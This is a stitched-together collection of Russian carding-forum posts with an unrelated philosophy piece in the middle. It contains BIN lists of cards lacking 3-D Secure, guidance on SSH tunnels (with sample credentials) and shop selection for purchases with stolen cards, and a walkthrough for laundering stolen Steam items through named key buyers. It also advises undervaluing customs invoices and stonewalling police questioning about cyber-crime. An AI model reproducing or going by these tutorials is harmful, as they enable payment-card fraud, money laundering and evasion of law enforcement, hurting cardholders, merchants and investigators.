425522 COLUMBUS_BANK_AND_TRUST_COMPANY USA DEBIT CLASSIC
468018 ZIONS_FIRST_NATIONAL_BANK USA DEBIT CLASSIC DEBIT CLASSIC
430712 WELLS_FARGO_BANK,_NATIONAL_ASSOCIATION USA DEBIT CLASSIC
446053 U.S._BANK_NATIONAL_ASSOCIATION USA DEBIT CLASSIC

VENEZUELA NO-VBV bins:
454042 credit premier
540139 credit standart


Рабочеё время в ЮСА

Всем доброго времени суток!
Сделал для себя табличку, в которой время 09:00-16:00 пиндосов сопоставлено с нашим московским.
Разбито все по штатам и поясам, вы легко можете отредактировать файл под свое время. Переход на зимнеё время (-1 ч.) будет 2 ноября 2021 года в 2 часа ночи по местному времени (в 1-ое воскресенье ноября).
Надеюсь кому-нибудь будет полезно!


Использование SSH-туннелей

Периодически буду выкладывать интересную инфу с пабликов/приватов ру/енг форумов, которая может пригодиться в работе.
Всем привет. Многие наверное сталкивались с проблемой маложивучести соксов и их присутствием в различных блеках. Как вы уже заметили сейчас набирает обороты продажа SSH-туннелей. SSH- туннель - это по сути своей тот же сокс, но работает он немного по другому принципу, что дает ему продолжительную живучесть. Да и в блеках SSH-туннели менеё светятся. Их использование не представляет из себя ничего сложного, но многие еще не сталкивались с работой с SSH и иногда спрашивают в жабе показать как это делает. Поэтому я решил написать эту крохотную статейку, надеюсь вы найдете в ней пользу.
Итак, SSH-туннель выглядит так: 12.109.149.226;admin;default
12.109.149.226 - SSH IP
admin - логин
default - пароль

Мы будем использовать ачатовскую программу "Plinker", она очень проста:
Собственно вводим все данные IP, логин, пароль SSH-туннеля, адрес локального сокса и доп параметры не трогаем, оставляем как есть.
Жмем старт. Вылетает командная строка:
Вводим букву "y", жмем ENTER.
Вуаля, туннель запущен.
Теперь запускаем всем известный проксифаер, вводим туда сокс,
который прописан в "Адрес локального сокса". Пользуемся.
Туннели хороши для тех случаев, когда нужно несколько раз зайти в один и тот же акк с одного IP (например в палку). Это быстреё чем с деда. Ну а насчет смертности SSH-туннелей, тут уж как повезет, ищите селлеров, покупайте, тестируйте. У меня жили 5-7 дней, думаю и больше проживут.


Краткое описание статусов ордера
Как правило шопы предлагают делать ордера под 2 видами пользователей.
1. Зарегестрированный пользователь
2. Гостевой аккаунт
В первом случае, перед оформлением заказа, Вам необходимо пройти полную регистрацию в шопе, подтвердить в некоторых случаях емайл, а только после этого приступить к процессу шопинга.
Во втором случае, все гораздо проще, выбираем стафф, идем в корзину, жмем чекаут и вперед оплачивать стафф.
Итак мы вбили данные карты, если все ок, нам не выдало decline,то выкинуло на страницу где идет краткое описание стаффа и магическое слово Processing.
Processing это сверка ордера, проверка на мошенничество и списание денежных средств с карты.
На мыло вы получите письмо, аля тратрата, вы сделали такой то заказ, Ваш ордер обрабатывается.
Charged это появляется через некоторое время, это означает, что деньги с вашей кредитной карты успешно списаны.
Packaging ваш заказа сформирован и проходит процесс упаковки.
Shipped ваш заказ отправлен. Вы так же получаете подобное письмо на емайл. Где то после 9 часов вечера, Вы в шопе сможете просмотреть трэк посылки.
Hold это значит что по какой то причине, шоп заморозил процесс по вашему ордеру, болеё подробно.
Вы сможете узнать внутри шоп акка или в письме.
Void Ордер отменен, деньги возвращены на карту. Думаю тут пояснять не нужно.
Также хочется добавить, что вместо статуса Processing, может быть Pending.
Ещё могут отменить ордер вот так - This order has been rejected. У меня было такое когда билл и шип разные, тупо отказывают не объясняя причины.


Ищем шопы по мерчу

Очень часто возникает необходимость найти шоп не только с определенным товаром, но и с определенным мерчем. Думаю все согласятся, что одни мерчи хавают один материал лучше других, да и вообще проще вбиваются. На полноценную статью может быть и не тянет, но думаю будет неплохой совет стафферам, как искать шопы по мерчу.

1) Часто на сайтах шопов есть логотип мерча, который они используют для получения оплаты. Таких логотипов у одного мерча может быть превеликое множество, будем искать на примере autorize.net.
Находим логотип данного мерча в картинках гугла.
2) Открываем сервис гугла "Поиск по картинке" хттп://images.google.com/imghp?hl=ru
3) Клацаем по указанной кнопке, добавляем лого мерча.
4) А дальше вбиваем в строке гугла то, что нам нужно, shop+worldwide+whisky-ebay-amazon и т.д
5) Профит, получаем список шопов с нужным стаффом и нужным мерчем. Варьируйте логотипы мерча и ищите. И будет вам счастье.


Что делать, если всё же взяли?

Нашёл на просторах интересную статью, старая но очень полезная, кто не читал, советую!

1. Что делать?
Если попал и не уверен, что делать – молчи, не зависимо от того, что говорит “бесплатный” адвокат.

2. Язык твой – враг твой.
Если до адвоката дело еще не дошло – все равно молчи и говори что ничего не знаешь, ничего не видел, ничего не делал.

3. Не бойся.
Будут делать больно(есть разные нехорошие методы) – все равно говори что ничего не знаешь.
Калечить не станут – те кто этим занимается – профессионалы. Будет больно – потерпишь, а синяки и даже вывихи, что тоже бывает – пройдут.

4. Сразу начнут запугивать.
Будут пугать сроком и суровой статьёй (это всегда первый приём любого “сотрудника”) – морозься. Говори что ни в чем не виноват.

5. Не гони понты.
Не оскорбляй “сотрудников”, не строй из себя крутого, не показывай что уверен в себе. Не говори что тебе ничего не будет, не говори что не смогут ничего доказать. Не говори что тебя все равно отмажут, даже если так и будет.
Если даже знаешь, что завтра выйдешь (папа там у тебя, предположим, крутой, или друган есть серьезный который вытащить может) – НИКОГДА не говори “да я все равно завтра выйду”.
Попал – сцуко веди себя как нормальный адекватный пассажир в переполненном вагоне метро – не гони понтов и молча жди, когда сможешь выйти.
Начнешь говорить – ничем хорошим 100% не кончится – по-любому докопаются.

6. Ни в чём не признавайся
Если даже кажется что всё совсем фигово и уже поймал жесткое очко – всё равно помни житейскую мудрость -”чистосердечное признание облегчает следствие и является прямой дорогой в тюрьму” (и это не шутка, это реальность).

7. ИДИ В ОТКАЗ.
Знай, сначала тебя, скореё всего, заставят писать объяснительную (если конечно нет прямых неоспоримых улик твоей вины). Ничего не пиши. Скажи что ничего не знаешь и отказываешься давать показания. ЗНАЙ – заставить тебя силой что-либо объяснить или писать НЕ МОГУТ.

8. РУЧКА.
НЕ БЕРИ В РУКИ РУЧКУ. Сцуко, вообще НЕ ТРОЖЬ ЕЁ! Хоть раз дотронешься, и ты попал. Значит сдался. Значит раскатают.

9. Легенда.
Ничего не объясняй на словах. Вообще ничего! Придумал грамотную легенду, которая объясняет что ты не виноват? Молодец. Всё равно молчи – не рассказывай этой легенды никому, пока что тебе все равно лучше молчать.

10. Будет больно.
Дальше тебе будут долго, возможно в пределах часов пяти – ебать мозг. А могут и делать больно хоть всю ночь – все равно терпи – главное – не выёбывайся и молчи. И даже не заикайся о том, какие они пидараcы. Поверь, они и без твоих оскорблений отлично знают, что ты о них думаешь.

11. Угрозы и запугивания – немного про птиц.
Тебе могут грозить (начиная с того момента, как начнешь открещиваться от всего и морозиться) “кинуть на ночь в камеру к петухам” xDDD Есть у этих товарищей такой прикол. Но это – именно прикол. Знай – во-первых в РОВД как таковых “камер” вообще нет, есть только пара холодных бетонных быдлятников, где держат людей по ночам (хорошо еще если там есть что-нибудь деревянное – помни, в таком быдлятнике можно легко отморозить жопу и поймать нехорошую болезнь половых органов. И тебе кто потом будет оплачивать лечение. За решёткой твоё здоровье – только в твоих руках. Старайся его беречь насколько это возможно).
Ну так вот, вернемся к нашим баранам, точнеё петухам :-D Знай, что хотя пугать неопытных правонарушителей вроде тебя – чем-то надо.. но петухов на всех не упасесся. Кроме того “петухи” – это те “кого”, а не те “кто”.
Короче усвой тот ФАКТ, что пока ты не попадешь, как минимум в СИЗО (а это произойдет только после того, как *суд* примет решение о взятии тебя под стражу, тебе официально предъявят обвинение и по твоему делу начнется следствие) – ну так вот, до этого момента никто тебя, даже если ты косишь под Шерон Стоун и разговариваешь фальцетом – ну ты понял чего – не будет.
А уже начиная с СИЗО – там – если уж ты совсем бесхарактерное эмо, то так тому и быть, а если ты хотя бы крепок духом – пусть даже не телом(а крепких только телом опускают так же, как и слабаков – там реально важна только сила духа) – ну так вот, там – не зависимо от воли тех, кто тебя туда отправил – всё станет на свои места, и ты займешь то положение, которое заслуживаешь.
В общем этот приём, как и любые другие аналогичные запугивания – совершенно стандартен, и ни на эту, ни на какую другую подобную страшилку – реагировать совершенно никак не стоит (но не вздумай сказать следователю “харош прикалываться” или “харош меня запугивать”. Просто сохраняй хладнокровие, будь спокоен и МОЛЧИ. Не мешай человеку работать..).

12. Как со всем этим справиться?
Думай об облаках. О том, какие они красивые, как там летают птицы, как светит солнышко и как там хорошо…
Будут угрожать и пугать – думай об облаках. Дадут по морде со всей дури за то, что молчишь с отстранённым видом – так, как будто думаешь об облаках – все равно думай об облаках. Зубы тебе и выбивать не станут, кости не поломают. А синяки максимум за неделю заживут. Спросят о чем думаешь – можешь сказать “ни о чём” (смотри не проболтайся что думаешь об облаках). Спросят о чём угодно ещё – повторяй что “ничего не знаешь” и “тебе нечего сказать”.

13. Психологическая уловка.
Тебе обязательно скажут о том, что раз ты молчишь – значит ты 100% виноват – потому что если бы не не был виноват – не молчал бы. Это – тоже стандартная уловка – не ведись. Им надо всеми способами заставить тебя “говорить” хоть что-либо. Тогда по закону ты потеряешь право не давать показаний в дальнейшем.
Не попадись на это – МОЛЧИ!

14. Берут на испуг.
ЗНАЙ, сразу же, как только тебя начнут допрашивать – если на тебя есть хоть какие-то жалкие серьёзные подозрения – тебе скажут, что на тебя УЖеёсть неопровержимые улики!, назовут тебе длинный список статей, по которым ты идешь, назовут сроки заключения (максимально возможные) по каждой из этих статей, в результате чего выяснится, что за то, что ты (по их мнению) сделал что тебе грозит минимум 7 (если что-то серьёзное, скажут что грозит 15, если очень серьёзное – скажут что ты УЖЕ идёшь на пожизненное) лет. Это – так же СТАНДАРТНЫЙ ПРИЁМ, призванный тебя напугать и сломить твою волю. По сути же это – галимый развод и полное фуфло. НЕ ВЕДИСЬ. И думай про облака.

15. ТЕБЯ БУДУТ ЖЕСТОКО ОБМАНЫВАТЬ.
(психоделический, но от того не менеё полезный пункт)
Сегодня тебе обещают впаять 7 лет и пугают неоспоримыми уликами, а завтра тебе выписывают административное правонарушение на 500р и отпускают – потому улик на самом деле нет. Для следователя это – как игра в покер для опытного игрока. Если у него действительно есть *хорошая карта* – он лишь спокойно скажет ,”играю”… Если же у него нет ничего – будет делать вид, что у него как минимум фулл-хаус, если не роял-флеш. Так и тут.
Поэтому уже на данном этапе усвой урок – если ты попал – НИКОМУ НЕ ВЕРЬ. Особенно тому, что говорит следователь. Он тебя будет стараться не просто обмануть… Он тебя будет обманывать “в квадрате”, если не в кубе! Потому что для него ты – работа. Ему пофигу, что ты о нем подумаешь, если он тебя удачно(или же не удачно) обманет. Ему плевать, насколько ты начнешь его презирать, будучи подло и удачно обманут. Для него главное – результат. Расколоть тебя. И ВСЁ, что он будет тебе когда либо вобще говорить будет иметь одну цель – РАСКОЛОТЬ ТЕБЯ.
А, поскольку, я думаю, ты не разделяешь его желаний – по большому счёту – можешь вообще его не слушать. Представь, что его голос – своеобразная мелодия… слушай её, но не вдумывайся. Слушай и представляй облака. Отстранись ото всего. Не принимай ничего близко к сердцу. Твоя единственная настоящая задача – как минимум до предъявления тебе официального обвинения – не давать НИКАКИХ показаний, а так же – насколько это возможно – сохранять психологическое равновесие. Так что отринь всё плохое. Смотри на всё со стороны. В общем, думай об облаках.

16. Что можно и нужно говорить?
Единственные фразы, которые тебе можно произносить при “сотрудниках”: “я ничего не знаю”. “я не виноват”. “я отказываюсь что-либо писать”. “я отказываюсь что-либо объяснять”. ”мне всё равно” с последней фразой по-аккуратнеё, после неё тебя либо сильно куда-нибудь ударят, любо сначала отправят на нарко-экспертизу, а потом уже ударят. Не важно – терпи, так надо. И главное – после каждой такой фразы говори – “я отказываюсь давать показания” (с этим будет психологически трудно, но держись. можно только так).

17. Тебя будут разводить.
Тебе обязательно объяснят, что молчание это уже само по себе признание вины. Скажут, что если будешь молчать – все эти 7\15\ пожизненно ты и получишь. А если расскажешь всё как было – (расскажешь свою “легенду” о том, что ты совершенно невиновен, ты ведь её уже придумал? – продолжай держать её в секрете! Если расскажешь, какой ты невинный, хороший и пушистый – считай, что рассказал всё как было на самом деле. С опытом поймёшь почему это так, но это так.)

Тебя будут убеждать, что “если ты расскажешь, как всё было, и раскроешь глаза тем самым им глаза на то, какой ты хороший, пушистый и ни в чем не виноватый – тогда можешь и вообще через час выйти на улицу свободным… “мы же не станем держать в заключении невиновного человека!”

ЗНАЙ – это – очередная уловка. ДАЖЕ твоя “легенда” о том, что ты не виновен – это УЖЕ показания, а НАЧАВ ДАВАТЬ ПОКАЗАНИЯ, ты автоматически теряешь своё конституционное право в дальнейшем не давать показания. Из чего следует, что рассказав любую сказку или легенду, пусть ты по ней хоть 10 раз ни в чём не виноват – ты как минимум попадаешь под статью о даче ложных показаний (для этого “им” достаточно будет доказать то, что хотя бы один из пунктиков твоей сказки не соответствует действительности), а это ужеСРОК. Хочешь срок? Если нет, тогда МОЛЧИ!!!
И держи свою легенду в тайне.

18. Подбирай слова.
Знай, если ты попал – тебя будут прессовать. Возможно жёстко прессовать, как морально, так и физически.
Помни: ни в коем случае не говори сотрудничкам “нехочу”. Это автоматически вызовет удар в какую-либо точку твоего тела. Причем ударивший тебя не будет ни в чем виноват – просто у них такие рефлексы. (”не буду” можно, но гораздо лучше и правильнеё говорить “отказываюсь”).
Знай, у тебя есть ПРАВО не давать показания, которые могут быть использованы против тебя (на этом основании ты можешь, и ДОЛЖЕН не давать ВООБЩЕ никаких показаний).
А о том, что у тебя есть это “право” там знают не хуже тебя, и именно это право у тебя будут всеми средствами пытаться отнять самым первым – заставив тебя рассказать байку о том, что ты не виновен.

19. Если ты пока пока еще “свидетель”
Если тебя вызвали как свидетеля и заставляют давать показания: по закону ты не имеёшь права отказаться давать показания, кроме как против себя и своих близких родственников. ЭтоЛЕГКО могут попытаться использовать для того, чтобы получив от тебя “свидетельские” показания – использовать их против тебя. ЭТО – УЛОВКА.
Если ты никого не убил и не сделал ничего действительно нехорошего, а всего лишь совершил какое- нибудь мошенничество или, скажем, любое “компьютерное” преступление – тебя наверняка, в “первый” раз, вызовут как свидетеля и, грозя уголовным наказанием за отказ от дачи свидетельских показаний – будут пытаться вытянуть из тебя столько информации, сколько возможно.
После этого, скореё всего сразу же после того, как выпытают из тебя всё, что можно в качестве “свидетельских показаний” – тебе скажут, что вынуждены тебя временно задержать (имеют полное право, даже без малейших оснований – до трёх суток “для выяснения обстоятельств”).

20. Всем хочется кушать, или развод на деньги.
Дальше – дальше тебя будут держать трое суток и ждать, пока “за тебя” кто-нибудь придет “разговаривать”, расскажут, кто на тебя есть весьма серьёзные улики (90+% которых – твои же собственные, только что данные показания), а затем – будут надеяться на то, что с ними попробуют “договориться”. И будь уверен, твой папа\родственник\верный друг – таки отдаст за тебя следаку N десятков тысяч деревянных… по сути просто за то, чтобы бумаги с твоими же показаниями “отдали” обратно, а тебя отпустили.

Всем ведь кушать хочется. А на одну зарплату прожить не всегда просто.

21. Мини-итоги.
В общем теперь ты уже знаешь, почему, хотя на тебя и есть весомые “логи” у провайдера и ты таки засветил свой IP (ну или, если ты не кибер-преступник, а преступник самый обычный, но не совершивший ничего излишне-социально-опасного)- тебя вызвали именно как свидетеля.

22. Так что же все-таки делать?
Что делать? – Говорить что: “ничего не знаешь”,”ничего не видел”,”не помнишь” (кстати, если тебя вызвали как свидтеля в этом есть и плюс – бить тебя не будут, могут только очень сильно давить морально\угрожать\запугивать итд. в общем использовать для этого все доступные великой наукой психологией методы. А этих методов у опытного следователя много, так что держись) – и главное – не забывай, что ты на самом деле “ничего не знаешь”,”ничего не видел” и “не помнишь”.
Даже болеё того, постарайся самому СЕБЕ внушить, что ты “ничего не знаешь”, ”ничего не видел” и “не помнишь”.
Если тебе мало лет и ты выглядишь хлюпиком, можешь хоть прослезиться с этими фразами не устах.
Бить не будут. Но мгновенно поймут, что многого от тебя не добьешься и немного умерят пыл “опроса”. Заметь, прикидываться таким придурком на ДОпросе – не стоит. Там если ты будешь гнать откровенную чушь “прослезившись” – тебя могут жестоко побить. Как вести себя на ДОпросе я уже описал – будь спокоен как вода в озере в тихий безветренный день и думай об облаках. Не показывай силы, не показывай слабости. И при этом – ничего не говори, кроме описанных выше “я отказываюсь давать показания” (статья 51 конституции). И попроси это зафиксировать. Не подписывай даже этого!
Потом будет дополнительная карта у адвоката, если будете нанимать. Если нет – хуже от того что не подпишешь не будет, а лучше не будет точно.
Желательно ТУТ даже не говорить “я не знаю” и “я не видел”.
И, конечно же, не забывай НЕ БРАТЬ В РУКИ РУЧКУ.

23. Попытаются использовать твою неопытность.
Что еще тебе нужно знать:
Предлагая тебе дать показания (они же “сказка про белого бычка”, они же “легенда”) обязательно будет что-то подобное:
- Почему не будешь рассказывать? Говори, не бойся! Ты всегда можешь любые свои показания, если захочешь, сменить! А мне они нужны для …(ну там.. для отчёта начальству, чтобы не обьяснять самому всю ситуацию тому, кому пойдет дело, может быть придумана любая причина)
- Объясни мне на словах хотя бы, как все было, а я напишу – просто для себя. Не бойся – можешь даже это не подписывать. Это – просто формальность”

Будь уверен, хотя слова могут отличаться, суть останется та же. От тебя будут требовать обьяснений хотя бы на словах. Даже “без подписи”.
Если ты внимательно читал правила, описанные выше, то у тебя сразу в голове должны возникнуть евенты:
1. Не говори ничего кроме “я попросил записать, что отказываюсь давать показания”. (”я не знаю”, “я не видел”, “я не помню”, “я не виноват” по своей сути УЖЕ показания. Будть с этим крайне осторожен.
2. On event “ручка” в памяти всплывает “НЕ ПРИКАСАТЬСЯ К РУЧКЕ”. Молодец.


О доставке и таможне

Типы служб доставки

Parcel Post – обычная почта. срок доставки – непредсказуем, т.к. обычно – пароходом. но если посылка маленькая, то могу отослать и через AirMail;
AirMail – доставка самолетом. срок – от недели до месяца;

Службы доставки

Государственные (почтовые службы): USPS (USA), Royal mail (UK), Deutsche Post (Germany), Почта России.

USPS Это одна организация, но отправить через неё можно многими способами.

Самые ходовые службы USPS:
— USPS Priority mail – срок доставки: 1-2 недели. минимум 4 дня. НО! так как посылка через Priority Mail после таможни попадает в Почту России – посылки данным сервисом дольше идут по России, чем едут из-за рубежа. суммарное время прохождения без таможни из Америки 14-23 дня. отслеживать перемещения товара возможно через специальный сервис USPS на территории Америки, и через аналогичный сервис Почты России на территории России;
— USPS Express mail international (EMS) – самый дорогой из разумных, но самый вменяемый сервис. В зависимости от штата отправки и погоды (не шутка) появляется в России на 2-й или 4-й день. сразу встает в очередь на таможню. после таможни на следующий день встает в курьерскую отправку к вам на адрес (это про Москву). очень редко задерживают на этом этапе на два дня. по номеру отслеживается на всем пути, либо на сайте EMS либо у операторов Почты России (по телефону, круглосуточно). по отзывам – никогда ничего не теряется. данный сервис во многих странах имеёт название EMS POST. в Китае и многих «привлекательных» для покупки странах он есть и ищется по названию страны и фразе EMS (Express Mail Service) в Германии нет, там DHL;
— USPS First class mail – почти тоже самое, что USPS Priority Mail, применительно к России (то, что закладывали создатели в Priority Mail не очень работает в России – поэтому выходит одинаково). медленеё не будет, но дешевле;

Тарифы и время прохождения всех вышеописанных посылок из Америки можно посмотреть на сайте USPS в разделе «Calculate postage».

Транзитные сроки реальные, но не учитывают Российскую таможню и Российскую «последнюю милю» нашей почты, которая во всех случаях, кроме USPS Express Mail оставляет желать лучшего. Во
всех трёх случаях выдадут трэкинг (номер, по которому можно следить где сейчас посылка). Все три варианта, после пересечения границы, превращаются в Почту России. EMS может принести товар на дом, в остальных случаях нужно забирать на почте.

Таможенная стоимость – по законодательству эта стоимость включает в себя затраты на покупку, плюс затраты на страховку груза, плюс затраты на доставку груза. Затраты на покупку определятся на основании invoice который едет прилепленный скотчем к коробке.

Определить цену на таможне могут тремя способами:

1. На коробке по так называемую invoice. В этом случае бывалые люди говорят что можно указать цену, заведомо меньшую чем максимальная сумма безпошлинного ввоза, само собой в валюте той страны откуда посылка, и таможня без проблем пропустит ваш стаф.
Универсальная фраза в шопе с просьбой занизить invoice: «Please do not enclose any papers, advertising materials, or anything except an invoice for $399.95». Иначе могут написать на пакете что он стоит $400, а внутрь положить оценку на $5000 и проспекты. Если отправление потеряется, то продавец не получит страховки больше, чем написано в оценке отправления. Соответственно не будет хотеть вам возместить сумму больше, чем был написан invoice. Этим и объясняется нежелание многих продавцов это делать. Ведь если вы оплатите через paypal, то потом можете потребовать полную сумму оплаты.
Поэтому у многих крупных продавцов в правилах написано о том что сумму invoice они не занижают.
Мнение из зала: В одном из случаев, покупая дорогую безделушку, я уговорил занизить инвойс только таким способом – предложил оплатить две суммы с пэйпэла. $400 «за товар», а остальные несколько тысяч «за услуги». Таким образом я лишил себя возможности требовать деньги назад и успокоил продавца.

2. С таможни придет уведомление что нужно каким-либо способом уточнить сумму товара (в случае USPS Express Mail вам это скажут диспетчерши по телефону), тк она заведомо больше чем сумма безпошлинного ввоза. На разборки надо привезти распечатку об оплате и заявление в свободной форме.
Список документов есть на сайте www.emspost.ru в разделе «документы». Процедура недолгая – несколько окошек и обычно небольшой хвостик очереди. Если вы занизили стоимость инвойса и посылку задержали, то вас не посадят. Пишите в заяве реальную стоимость, пишите – «хрен знает почему отправитель её такую указал» и после уплаты положенных сборов вас отпускают с посылкой.
Таможня в Москве имеёт очередь по «прохождению» или «задержанию» посылок через неё. В обычное время 3 дня-неделю. В предновогоднеё – до двух недель. Этот срок надо добавить к почтовым.
Так же таможенные уведомления могут затеряться и тогда, если вы сами не подсуетитесь и через некоторое время не позвоните им, товар может быть отправлен обратно.

3. Таможня «положит с прибором».
Как показал опыт, все три варианта равновозможны.

ВНИМАНИЕ! В графе в invoice не стоит писать Gift (дарение) вам это выйдет боком. Дело в том, что в нашем законодательстве отсутствует понятие Gift (дарение), поэтому цена определяется самостоятельно работником таможни. Эта цена может быть определена на основе каталогов (как правило устаревших), рыночной цены в интернете, либо просто от вас потребуют выписки с банковской карточки для подтверждения расходов (а там — оплата за товар + доставка).
Варианты таможенной пошлины:
— при пересылке через почтовые службы (USPS, Royal mail, Deutsche Post, Почта России) – до 1 тыс. Euro. не взимается. получать посылку на указанную выше сумму можно не чаще чем раз в неделю. пошлину оплачивают от суммы которая получается сверх разрешенной в размере 30% от неё, сумма доставки в стоимость товара как правильно не входит;
— при пересылке через службы доставки грузов (DHL, FedEx, USP) – до 5 тыс. руб. все остальное аналогично почтовым службам + ГТД, ставка таможни по коду товара, а потом НДС. в зависимости от кода товара это обычно ((«цена товара»+«цена пересылки»)+15%)+НДС (привезенное ими не попадает под льготные правила растаможки почтовых отправлений для частных лиц и должно быть растаможено в полном объеме). Но тут я до конца не разобрался, возможно что ГТД и НДС – только для юр. лиц. (скореё всего так оно и есть);

Получение посылки:
Процесс не так прост как кажется, не подписывайте ничего пока не осмотрите упаковку, если она повреждена (товар сломан), или нарушена (украден), то можно ничего не подписывать и звать работника почты и составлять акт. Но прав у вас, если что-то пошло не так (сломано, украдено и т.п.) мало.
В случае задержании посылки есть три варианта:
— отправить посылку обратно;
— ехать таможить самому в Домодедово;
— воспользоваться услугами фирмы доставки для растаможки (2-3 тыс. руб.);
Что нельзя перевозить через таможню:
— парфюм;
— оружие;
— ножи;
— ценный антиквариат;
— табак и алкоголь;


SumUp магазин

Во время поиска шопов наткнулся на такой сайт как https://sumup.co.uk Как я понял идея такая, что продавец создает ссылку на оплату какого-либо товара, отправляет её покупателю, он открывает её у себя на телефоне, вводит данные своей карты и осуществляет платеж. Может я что-то не так понял, так как с английским туговато, поэтому выкладываю на обозрение для участников клуба. Давайте вместе болеё детально проанализируем эту систему и попробуем найти способ как можно ли её использовать для "наших" целей и вообще возможно ли использование этой системы вообще?


Смысл жизни? Философия как "камертон"
Философия как наука занимает особое положение. её особенность выражается в том что действительно в отличии от всех прочих наук, философия сама по себе не в состоянии решить ни одной практической задачи и именно это обстоятельство создаёт иллюзию её никчемности. С другой стороны, если обратится к тем самым наукам которые решают эти самые практические задачи, то за период многовековой истории развития цивилизации вся эта совокупность наук не только решала проблемы, но и создавала новые проблемы.
Как решать эти новые проблемы совокупность этих наук не всегда знает!
Пример: развивая ядерную энергетику, среди продуктов которые оставляет ядерная энергетика в качестве побочных материалов, плутоний (период полураспада плутония 24000 лет). Цивилизация земная создаёт ежегодно 120000 т. различных ядерных отходов.
Куда это девать, и чего с этим делать?
К настоящему времени рецептов переработки всего этого нет!
Вернемся к философии, философия подобна камертону. На камертоне не возможно исполнить даже самую простенькую мелодию, с другой стороны если нету камертона, а у музыкантов нет абсолютного слуха, то оркестр без камертона настроить не возможно! Ну а если есть у музыкантов абсолютный слух, то тогда они прибывают во мнении, что камертон им не нужен, им и так хорошо они и так знают где находится ля первой октавы и настроят инструмент по методу внутреннего голоса! И всё будет хорошо)
Философия это своего рода камертон только болеё сложный, который задает не одну ноту, а некую совокупность базовых идей по которым настраивается весь спектр частных научных дисциплин которые занимаются решением практических вопросов, и соответственно если у людей не развито чувство меры то им необходимо философия как инструмент, который на основе индивидуального чувства меры и неких базовых идей, позволит привести в гармонию чувство меры всех остальных, кто занимается теми или иными практическими вопросами в науке, технике, музыки, искусстве. Тогда получается так, если философия адекватна и не фальшивит, то есть шансы на то что вся совокупность частных наук будет решать проблемы с которыми сталкивается человечество, и не будет создавать новых проблем, которые могут сильно усложнить жизнь потомкам, по скольку человечество воспроизводит новые проблемы в лавинообразном порядке по мере того как ускоряется научно технический прогресс, этих проблем становится всё больше и больше. Последствия их не предсказуемы...
Вопрос который раскрываю взят с основ социологии (КОБ), примите информацию к размышлению, добавляйте пожалуйста практические, творческие знания по этой теме.


Статья про грязь steam

В этой статье расскажу, как правильно отмывать предметы и выводить steam wallet (валюта площадки).
Рассмотрим, что у нас есть в наличии:
1. Аккаунт с рабочей ТП(торговая площадка), без каких-либо ограничений на обмен.
2. Dedicated server на котором авторизованный аккаунт-приниматель с ворованными предметами.
Для того, чтобы не забанили основной аккаунт на который будут отсылаться ворованные вещи, необходимо провести ряд манипуляций. Для начала, нам необходимо общаться самим с собой (между аккаунтом-принимателем и основным аккаунтом), устраиваем торги, шутим шутки и т.п, после того, как договорились с ценой, отсылаем offer(предложение обмена) с комментарием: Деньги выслал на
QIWI кошелёк с ссылкой на скрин. Желательно, чтобы основной аккаунт тоже выставил любой предмет в обмен на грязные вещи. После принятия офера благодарим друг друга и оставляем коммент на стене аккаунта-принимателя по типу: +rep nice trader.
Отмываем steam wallet (валюта площадки) следующим образом, в наличии у нас:
Основной аккаунт/Аккаунт-приниматель с steam wallet (неважно с каким способом мы получили эти деньги)
В клиенте steam наводим на раздел СООБЩЕСТВО, Далее открываем подраздел ТОРГОВАЯ ПЛОЩАДКА и ищем предмет "Ключ ящика Манн Ко"(TF2 ключ), покупаем в нужных нам количестве.
Далее списываемся с покупателем ключей(http://vk.com/vladislav_bayov, http://vk.com/id25451755, http://vk.com/max_funny), я лично сливал отправлял 50 ключей по 56 рублей каждый. Покупатель может спросить грязные ли ключи, говорите, что ворованные, следом он скинет ссылку на фейковый аккаунт куда будет принимать ваши ключи.


FAQ по анонимности и безопасности

В этом курсе я постараюсь рассказать всю самую основную и ценную информацию по анонимности и безопасности при работе в сети. Данный курс не является призывом к каким-либо плохим действиям. Данный курс будет построен на основе моего личного опыта, нескольких статей и частично на одном платном курсе по анонимности и безопасности. Зачем слушать несколько часов лекций, сидеть днями и ночами с поисковиком и искать актуальную информацию, когда здесь собрано все в одном месте? Материал будет идти по порядку. Я не расскажу вам ничего такого сверхъестественного, возможно, что кто-то знает всё, что здесь написано, а возможно вы новичок и ничего не знаете. В любом случае будет хорошо, если вы ознакомитесь с данным материалом. Все действия и примеры будут проходить на базе Windows 7 и курс предназначен для Windows пользователей.
Некоторые элементы и программы нужно будет настраивать и чтобы не захламлять курс информацией по установке и настройке, я буду давать ссылки на материал (все ссылки просмотрены и там только нужная информация без лишней воды).
Содержание:
Часть 1. Настройка ОС Windows для безопасной работы в сети.
Часть 2. Шифрование данных на ПК и способы удаления информации безвозвратно.
Часть 3. Все о паролях. Способы хранения.
Часть 4. Выход в интернет, выбор браузера и его настройка.
Часть 5. Безопасная почта, одноразовые заметки и передача файлов.
Часть 6. Анонимайзеры, Proxy, Socks5 и работа с ними.
Часть 7. Дедики и работа с ними. Схема работы через дедики.
Часть 8. VPN и все про VPN.
Часть 9. Методы безопасного общения в сети.
Часть 10. Бонусная статья "Как остаться максимально анонимным + примеры"
Часть 11. Заключение и выводы

Часть 1. Настройка ОС Windows для безопасной работы в сети.
Если вы занимаетесь чем-то серьезным в сети и работаете с ОС Windows, то я советую вам пересесть на Linux, но если такого желания нет, то тогда читаем дальше.
При работе с Windows используйте только лицензионное ПО и постоянно обновляйте систему с выходом новых обновлений. Обновления можно настроить в Панели Управления (Как их настраивать думаю разберется каждый). Если вы делаете какое-то важное дело в сети, то лучше всего создайте отдельную учетную запись для работы с правами пользователя. Если вы словите вирус, то он не сможет полностью активироваться и прописаться в систему, т.к. большинство вредоносных программ прописывают себя в реёстр, а без админских прав этого сделать невозможно. Вы можете работать и с основной учетной записи, но тогда вам нужно быть предельно внимательным к тому, что вы качаете из сети и какие сайты посещаете (дальше будет глава про браузеры). На учетные записи ставьте разные сложные пароли. Пароль должен быть рандомным. Мой совет: если вы и правда занимаетесь чем-то серьёзным и опасным, то поставьте VMware Workstation и производите все действия там. Видео по установке виртуальной машины (видео не мое):
Следующий шаг в настройке - это установка фаервола (Firewall). Устанавливать будем Comodo Internet Security. Скачать фаервол можно по ссылке:
http://www.comodo.com/home/internet-security/free-internet-security.php
После скачивания установим. Обязательно включим автоматическое обновление.
Инструкции по установке и настройке можно взять по этой ссылке (написано все очень подробно): http://www.comss.ru/page.php?id=1658
Базовую настройку мы выполнили, теперь необходимо перейти к шифрованию данных на ПК и к способам безвозвратного удаления данных.

Часть 2. Шифрование данных на ПК и способы удаления информации безвозвратно.
Для шифрования данных на компьютере будем использовать утилиту True Crypt.
